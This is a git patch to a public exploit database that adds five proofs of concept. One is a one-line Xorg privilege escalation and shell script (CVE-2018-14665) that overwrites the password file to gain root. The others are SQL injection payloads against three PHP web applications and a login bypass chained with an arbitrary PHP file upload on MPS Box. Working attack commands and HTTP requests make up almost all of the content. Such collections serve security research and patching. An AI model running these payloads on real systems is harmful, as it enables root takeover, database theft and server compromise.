From bbbf700308be45a3b5a6c5efd26335805f2d7af4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 27 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-27 5 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - Local Privilege Escalation Quick Count 2.0 - 'txtInstID' SQL Injection MPS Box 0.1.8.0 - Arbitrary File Upload Delta Sql 1.8.2 - 'id' SQL Injection Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection --- exploits/multiple/local/45697.txt | 29 +++++++ exploits/php/webapps/45698.txt | 83 +++++++++++++++++++ exploits/php/webapps/45699.txt | 130 ++++++++++++++++++++++++++++++ exploits/php/webapps/45700.txt | 59 ++++++++++++++ exploits/php/webapps/45701.txt | 86 ++++++++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 392 insertions(+) create mode 100644 exploits/multiple/local/45697.txt create mode 100644 exploits/php/webapps/45698.txt create mode 100644 exploits/php/webapps/45699.txt create mode 100644 exploits/php/webapps/45700.txt create mode 100644 exploits/php/webapps/45701.txt diff --git a/exploits/multiple/local/45697.txt b/exploits/multiple/local/45697.txt new file mode 100644 index 000000000..dc9870724 --- /dev/null +++ b/exploits/multiple/local/45697.txt @@ -0,0 +1,29 @@ +#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet + +cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su + +Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. + + + + + +#!/bin/sh +# local privilege escalation in X11 currently +# unpatched in OpenBSD 6.4 stable - exploit +# uses cve-2018-14665 to overwrite files as root. +# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid +# and vulnerable in default OpenBSD. +# +# - https://hacker.house +echo [+] OpenBSD 6.4-stable local root exploit +cd /etc +Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 & +sleep 5 +pkill Xorg +echo [-] dont forget to mv and chmod /etc/master.passwd.old back +echo [+] type 'Password1' and hit enter for root +su - + + +EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 \ No newline at end of file diff --git a/exploits/php/webapps/45698.txt b/exploits/php/webapps/45698.txt new file mode 100644 index 000000000..9c10f18ba --- /dev/null +++ b/exploits/php/webapps/45698.txt @@ -0,0 +1,83 @@ +# Exploit Title: Quick Count 2.0 - 'txtInstID' SQL Injection +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://quickcount.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/quickcount/files/latest/download +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/QCVote.php +# +# [PATH]/QCVote.php +# .... +# 90 $_SESSION['glbInstID'] = ""; +# 91 if ($_SERVER["REQUEST_METHOD"] == "POST") { +# 92 // collect value of input field +# 93 if (isset($_REQUEST['txtInstID'])) { +# 94 $name = $_REQUEST['txtInstID']; +# 95 } +# 96 if (isset($_REQUEST['btnA'])) { +# 97 $btnAVal = $_REQUEST['btnA']; +# 98 } +# 99 if (isset($_REQUEST['btnB'])) { +# 100 $btnBVal = $_REQUEST['btnB']; +# 101 } +# 102 if (isset($_REQUEST['btnC'])) { +# 103 $btnCVal = $_REQUEST['btnC']; +# 104 } +# 105 if (isset($_REQUEST['btnD'])) { +# 106 $btnDVal = $_REQUEST['btnD']; +# 107 } +# 108 if (isset($_REQUEST['btnE'])) { +# 109 $btnEVal = $_REQUEST['btnE']; +# 110 } +# .... +# + +POST /[PATH]/QCVote.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 268 +txtInstID=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||' +HTTP/1.1 200 OK +Date: Thu, 25 Oct 2018 16:35:16 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=q360l936bjohek90ekaj85b0r4; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 5976 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/QCAdmin.php +# +# [PATH]/QCAdmin.php + +Post/txtLogID=&txtLogPW=&txtSC=&txtExpDt=&txtSchName=&txtDept=&btnLogin=Login&txtInstClr=&txtLoginout=LoggedOUT + +# .... +#201 if ($_SERVER["REQUEST_METHOD"] == "POST") { +#202 // collect value of input field +#203 if (isset($_REQUEST['txtLogID'])) { +#204 $txtLogIDVal = $_REQUEST['txtLogID']; +#205 $_SESSION['glbLogID']=$txtLogIDVal; +#206 } +#207 if (isset($_REQUEST['txtLogPW'])) { +#208 $txtLogPWVal = $_REQUEST['txtLogPW']; +#209 $_SESSION['glbLogPW'] = $txtLogPWVal; +# ....Etc.... \ No newline at end of file diff --git a/exploits/php/webapps/45699.txt b/exploits/php/webapps/45699.txt new file mode 100644 index 000000000..b1124cd70 --- /dev/null +++ b/exploits/php/webapps/45699.txt @@ -0,0 +1,130 @@ +# Exploit Title: MPS Box 0.1.8.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.mpsbox.com/ +# Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download +# Version: 0.1.8.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/device_add.php +# +# http://localhost/[PATH]/tmp/[FILE] +# +# [PATH]/device_add.php +# .... +# 51 if(isset($_POST['upload'])) { +# 52 +# 53 $uploaddir = realpath(dirname(__FILE__)) . '/tmp/'; +# 54 $uploadfile = $uploaddir . basename($_FILES['files_to_upload']['name']); +# 55 +# 56 if (move_uploaded_file($_FILES['files_to_upload']['tmp_name'], $uploadfile)) { +# 57 // $_SESSION['status'] = "File is valid, and was successfully uploaded.\n"; +# 58 +# 59 $file_handle = fopen($uploadfile, "r"); +# 60 while (!feof($file_handle) ) { +# 61 $line_of_text = fgetcsv($file_handle, 1024); +# 62 if(!empty($line_of_text[0])) { +# 63 device_queue_add('new','',"$line_of_text[0]","$line_of_text[1]",'','1'); +# 64 } +# 65 } +# .... + +POST /[PATH]/login_page.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/login_page.php +Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 85 +username=%27or+1%3D1+or+%27%27%3D%27&password=%27or+1%3D1+or+%27%27%3D%27&login=Login +HTTP/1.1 302 Found +Date: Thu, 25 Oct 2018 13:34:44 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: http://localhost/[PATH]/device_add.php +Content-Length: 5652 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +POST http://localhost/[PATH]/device_add.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------20568543311864623172004480142 +Content-Length: 509 +-----------------------------20568543311864623172004480142 +Content-Disposition: form-data; name="files_to_upload"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------20568543311864623172004480142 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +100000 +-----------------------------20568543311864623172004480142 +Content-Disposition: form-data; name="upload" +Upload +-----------------------------20568543311864623172004480142-- +HTTP/1.1 302 Found +Date: Thu, 25 Oct 2018 13:35:07 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: device_upd.php +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + + +GET http://localhost/[PATH]/tmp/phpinfo.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 25 Oct 2018 13:35:38 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + + + + +
+
+
+CSV file template +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45700.txt b/exploits/php/webapps/45700.txt new file mode 100644 index 000000000..1d41c5870 --- /dev/null +++ b/exploits/php/webapps/45700.txt @@ -0,0 +1,59 @@ +# Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://deltasql.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download +# Software Link: http://deltasql.sourceforge.net/deltasql/ +# Version: 1.8.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1 + +GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 24 Oct 2018 00:12:57 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1 + +GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 24 Oct 2018 00:08:03 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2150 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45701.txt b/exploits/php/webapps/45701.txt new file mode 100644 index 000000000..e92dca216 --- /dev/null +++ b/exploits/php/webapps/45701.txt @@ -0,0 +1,86 @@ +# Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://vetclinic.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download +# Version: 00.02 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] +# +# [PATH]/petmaint.php +# .... +#154 $editpetnum = ""; +#155 +#156 if(isset($_POST["editpetnum"])) { +#157 $editpetnum = $_POST["editpetnum"]; +#158 unset($_POST["editpetnum"]); +#159 } +#160 else if(isset($_GET["editpetnum"])) { +#161 $editpetnum = $_GET["editpetnum"]; +#162 unset($_GET["editpetnum"]); +#163 } +# .... + +GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 25 Oct 2018 22:18:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/procmaint.php?proccode=[SQL] +# +# [PATH]/procmaint.php +# .... +#28 require_once "includes/common.inc"; +#29 $emplnumber = $_SESSION['employeenumber']; +#30 $display = "ProcMaint:".$emplnumber; +#31 if(isset($_GET["proccode"])) { +#32 $proccode = $_GET["proccode"]; +#33 } else { +#34 $proccode = ""; +#35 } +#36 if ($proccode == "") +#37 { +# .... + +GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 25 Oct 2018 22:22:33 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2697 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c5fd75fc0..61af09461 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10053,6 +10053,7 @@ id,file,description,date,author,type,platform,port 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86, 45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows, +45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40209,3 +40210,7 @@ id,file,description,date,author,type,platform,port 45691,exploits/php/webapps/45691.txt,"AjentiCP 1.2.23.13 - Cross-Site Scripting",2018-10-25,"Numan OZDEMIR",webapps,php, 45692,exploits/php/webapps/45692.txt,"MPS Box 0.1.8.0 - 'uuid' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80 45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php, +45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php, +45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php, +45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php, +45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,